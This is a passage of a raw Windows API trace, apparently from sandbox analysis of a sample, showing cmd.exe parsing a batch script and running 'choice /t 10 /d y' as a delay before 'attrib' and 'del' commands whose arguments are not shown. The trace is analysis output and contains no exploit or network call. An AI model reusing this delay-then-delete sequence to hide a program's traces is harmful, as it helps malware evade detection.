Locale=0x409, LCType=0x24, lpLCData=0x2effc60, cchData=128 | out: lpLCData="1") returned 2 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xabf81c, cchData=8 | out: lpLCData="/") returned 2 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xabf7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xabf778, cchData=32 | out: lpLCData="Tue") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xabf738, cchData=32 | out: lpLCData="Wed") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xabf6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xabf6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xabf678, cchData=32 | out: lpLCData="Sat") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xabf638, cchData=32 | out: lpLCData="Sun") returned 4 [0248.038] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xabf80c, cchData=8 | out: lpLCData=".") returned 2 [0248.039] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xabf7f8, cchData=8 | out: lpLCData=",") returned 2 [0248.039] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0248.051] GetProcessHeap () returned 0x3140000 [0248.051] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x0, Size=0x20c) returned 0x3140c08 [0248.051] GetConsoleTitleW (in: lpConsoleTitle=0x3140c08, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0248.170] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0248.171] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0248.171] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0248.171] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0248.171] ??_V@YAXPAX@Z () returned 0x1 [0248.173] GetProcessHeap () returned 0x3140000 [0248.173] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x400a) returned 0x31494b8 [0248.173] GetProcessHeap () returned 0x3140000 [0248.173] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31494b8) returned 1 [0248.174] _wcsicmp (_String1="choice", _String2=")") returned 58 [0248.174] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0248.174] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0248.174] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0248.174] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0248.174] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0248.174] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0248.174] GetProcessHeap () returned 0x3140000 [0248.174] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x58) returned 0x3140e20 [0248.174] GetProcessHeap () returned 0x3140000 [0248.174] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x16) returned 0x3140e80 [0248.175] GetProcessHeap () returned 0x3140000 [0248.175] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x22) returned 0x3140ea0 [0248.176] GetProcessHeap () returned 0x3140000 [0248.176] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x58) returned 0x3140ed0 [0248.177] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0248.177] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0248.178] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0248.178] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0248.178] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0248.178] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0248.178] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0248.178] GetProcessHeap () returned 0x3140000 [0248.178] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x58) returned 0x3140f30 [0248.178] GetProcessHeap () returned 0x3140000 [0248.178] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x16) returned 0x3140f90 [0248.179] GetProcessHeap () returned 0x3140000 [0248.179] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x52) returned 0x3140fb0 [0248.180] GetProcessHeap () returned 0x3140000 [0248.180] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x58) returned 0x3141010 [0248.180] _wcsicmp (_String1="del", _String2=")") returned 59 [0248.180] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0248.180] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0248.180] _wcsicmp (_String1="IF", _String2="del") returned 5 [0248.180] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0248.180] _wcsicmp (_String1="REM", _String2="del") returned 14 [0248.181] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0248.181] GetProcessHeap () returned 0x3140000 [0248.181] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x58) returned 0x3141070 [0248.181] GetProcessHeap () returned 0x3140000 [0248.181] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x10) returned 0x31410d0 [0248.182] GetProcessHeap () returned 0x3140000 [0248.182] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x4a) returned 0x31410e8 [0248.183] GetConsoleTitleW (in: lpConsoleTitle=0x2effaf8, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0248.318] malloc (_Size=0xffce) returned 0x3252620 [0248.319] ??_V@YAXPAX@Z () returned 0x2eff884 [0248.319] malloc (_Size=0xffce) returned 0x32625f8 [0248.320] ??_V@YAXPAX@Z () returned 0x2eff63c [0248.321] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0248.321] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0248.321] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0248.321] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0248.321] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0248.321] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0248.321] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0248.321] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0248.321] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0248.321] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0248.321] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0248.321] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0248.321] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0248.321] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0248.321] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0248.321] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0248.322] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0248.322] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0248.322] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0248.322] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0248.322] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0248.322] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0248.322] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0248.322] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0248.322] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0248.322] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0248.322] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0248.322] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0248.322] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0248.322] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0248.322] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0248.322] _wcsicmp (_String1="choice", _String2="START") returned -16 [0248.322] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0248.322] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0248.322] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0248.322] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0248.322] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0248.323] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0248.323] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0248.323] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0248.323] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0248.323] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0248.323] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0248.323] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0248.323] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0248.323] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0248.323] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0248.323] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0248.323] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0248.323] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0248.323] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0248.323] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0248.323] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0248.323] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0248.323] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0248.323] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0248.323] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0248.323] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0248.323] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0248.324] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0248.324] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0248.324] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0248.324] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0248.324] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0248.324] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0248.324] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0248.324] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0248.324] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0248.324] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0248.324] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0248.324] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0248.324] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0248.324] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0248.324] _wcsicmp (_String1="choice", _String2="START") returned -16 [0248.324] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0248.324] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0248.324] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0248.324] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0248.324] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0248.324] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0248.324] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0248.324] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0248.324] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0248.324] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0248.324] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0248.325] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0248.325] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0248.325] ??_V@YAXPAX@Z () returned 0x1 [0248.325] GetProcessHeap () returned 0x3140000 [0248.325] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xffd6) returned 0x31494b8 [0248.327] GetProcessHeap () returned 0x3140000 [0248.327] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x30) returned 0x3141140 [0248.327] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0248.327] malloc (_Size=0xffce) returned 0x32625f8 [0248.327] ??_V@YAXPAX@Z () returned 0x2eff3bc [0248.327] GetProcessHeap () returned 0x3140000 [0248.327] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x1ffa4) returned 0x3159498 [0248.330] SetErrorMode (uMode=0x0) returned 0x1 [0248.330] SetErrorMode (uMode=0x1) returned 0x0 [0248.330] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x31594a0, lpFilePart=0x2eff3dc | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x2eff3dc*="system32") returned 0x13 [0248.331] SetErrorMode (uMode=0x1) returned 0x1 [0248.331] GetProcessHeap () returned 0x3140000 [0248.331] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3159498, Size=0x3e) returned 0x3159498 [0248.331] GetProcessHeap () returned 0x3140000 [0248.331] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x3159498) returned 0x3e [0248.331] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xd4 [0248.331] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0248.331] GetProcessHeap () returned 0x3140000 [0248.331] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x1de) returned 0x3141178 [0248.331] GetProcessHeap () returned 0x3140000 [0248.331] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x3b4) returned 0x3146a48 [0248.347] GetProcessHeap () returned 0x3140000 [0248.347] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3146a48, Size=0x1e0) returned 0x3146a48 [0248.347] GetProcessHeap () returned 0x3140000 [0248.347] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x3146a48) returned 0x1e0 [0248.347] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.347] GetProcessHeap () returned 0x3140000 [0248.347] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xe0) returned 0x3141360 [0248.347] GetProcessHeap () returned 0x3140000 [0248.347] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3141360, Size=0x76) returned 0x3141360 [0248.347] GetProcessHeap () returned 0x3140000 [0248.347] RtlSizeHeap (HeapHandle=0x3140000, Flags=0x0, MemoryPointer=0x3141360) returned 0x76 [0248.348] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.349] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2eff168, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff168) returned 0x31413e0 [0248.349] GetProcessHeap () returned 0x3140000 [0248.349] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x0, Size=0x14) returned 0x3141420 [0248.349] FindClose (in: hFindFile=0x31413e0 | out: hFindFile=0x31413e0) returned 1 [0248.349] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x2eff168, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff168) returned 0xffffffff [0248.349] GetLastError () returned 0x2 [0248.350] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eff168, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eff168) returned 0x31413e0 [0248.350] GetProcessHeap () returned 0x3140000 [0248.350] RtlReAllocateHeap (Heap=0x3140000, Flags=0x0, Ptr=0x3141420, Size=0x4) returned 0x3141420 [0248.350] FindClose (in: hFindFile=0x31413e0 | out: hFindFile=0x31413e0) returned 1 [0248.350] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0248.350] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0248.350] ??_V@YAXPAX@Z () returned 0x1 [0248.350] GetConsoleTitleW (in: lpConsoleTitle=0x2eff66c, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0248.459] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eff598, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eff584 | out: lpAttributeList=0x2eff598, lpSize=0x2eff584) returned 1 [0248.459] UpdateProcThreadAttribute (in: lpAttributeList=0x2eff598, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eff580, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eff598, lpPreviousValue=0x0) returned 1 [0248.460] GetStartupInfoW (in: lpStartupInfo=0x2eff5d0 | out: lpStartupInfo=0x2eff5d0*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0248.460] GetProcessHeap () returned 0x3140000 [0248.460] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x18) returned 0x31413e0 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0248.461] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0248.462] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0248.463] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0248.463] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0248.463] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0248.463] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0248.463] GetProcessHeap () returned 0x3140000 [0248.463] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31413e0) returned 1 [0248.463] GetProcessHeap () returned 0x3140000 [0248.463] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa) returned 0x31413e0 [0248.463] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0248.465] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.465] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0248.790] _get_osfhandle (_FileHandle=0) returned 0x8c [0248.790] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x197) returned 1 [0248.903] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x2eff520*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eff56c | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x2eff56c*(hProcess=0xe8, hThread=0xe4, dwProcessId=0x13b8, dwThreadId=0x130c)) returned 1 [0249.190] CloseHandle (hObject=0xe4) returned 1 [0249.190] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0249.191] GetProcessHeap () returned 0x3140000 [0249.191] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3148a10) returned 1 [0249.191] GetEnvironmentStringsW () returned 0x3144b28* [0249.191] GetProcessHeap () returned 0x3140000 [0249.191] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa9e) returned 0x3147f68 [0249.191] FreeEnvironmentStringsA (penv="=") returned 1 [0249.191] WaitForSingleObject (hHandle=0xe8, dwMilliseconds=0xffffffff) returned 0x0 [0262.689] GetExitCodeProcess (in: hProcess=0xe8, lpExitCode=0x2eff504 | out: lpExitCode=0x2eff504*=0x1) returned 1 [0262.689] CloseHandle (hObject=0xe8) returned 1 [0262.690] _vsnwprintf (in: _Buffer=0x2eff5ec, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eff50c | out: _Buffer="00000001") returned 8 [0262.690] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0262.690] GetProcessHeap () returned 0x3140000 [0262.690] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147f68) returned 1 [0262.690] GetEnvironmentStringsW () returned 0x3147048* [0262.690] GetProcessHeap () returned 0x3140000 [0262.690] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xac4) returned 0x3147b18 [0262.690] FreeEnvironmentStringsA (penv="=") returned 1 [0262.690] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0262.690] GetProcessHeap () returned 0x3140000 [0262.690] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3147b18) returned 1 [0262.690] GetEnvironmentStringsW () returned 0x3147048* [0262.690] GetProcessHeap () returned 0x3140000 [0262.690] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xac4) returned 0x3147b18 [0262.690] FreeEnvironmentStringsA (penv="=") returned 1 [0262.690] GetProcessHeap () returned 0x3140000 [0262.690] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31413e0) returned 1 [0262.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eff598 | out: lpAttributeList=0x2eff598) [0262.690] ??_V@YAXPAX@Z () returned 0x1 [0262.690] GetConsoleTitleW (in: lpConsoleTitle=0x2effa98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SysWOW64\\cmd.exe") returned 0x1c [0262.782] malloc (_Size=0xffce) returned 0x3252620 [0262.782] ??_V@YAXPAX@Z () returned 0x2eff824 [0262.782] malloc (_Size=0xffce) returned 0x32625f8 [0262.782] ??_V@YAXPAX@Z () returned 0x2eff5dc [0262.782] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0262.782] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0262.782] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0262.782] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0262.782] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0262.782] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0262.782] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0262.782] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0262.782] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0262.782] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0262.783] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0262.783] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0262.783] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0262.783] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0262.783] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0262.783] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0262.783] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0262.783] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0262.783] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0262.783] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0262.783] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0262.783] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0262.783] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0262.783] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0262.783] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0262.783] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0262.783] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0262.783] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0262.783] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0262.783] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0262.783] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0262.783] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0262.783] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0262.783] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0262.784] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0262.784] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0262.784] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0262.784] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0262.784] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0262.784] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0262.784] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0262.784] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0262.784] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0262.784] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0262.784] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0262.784] 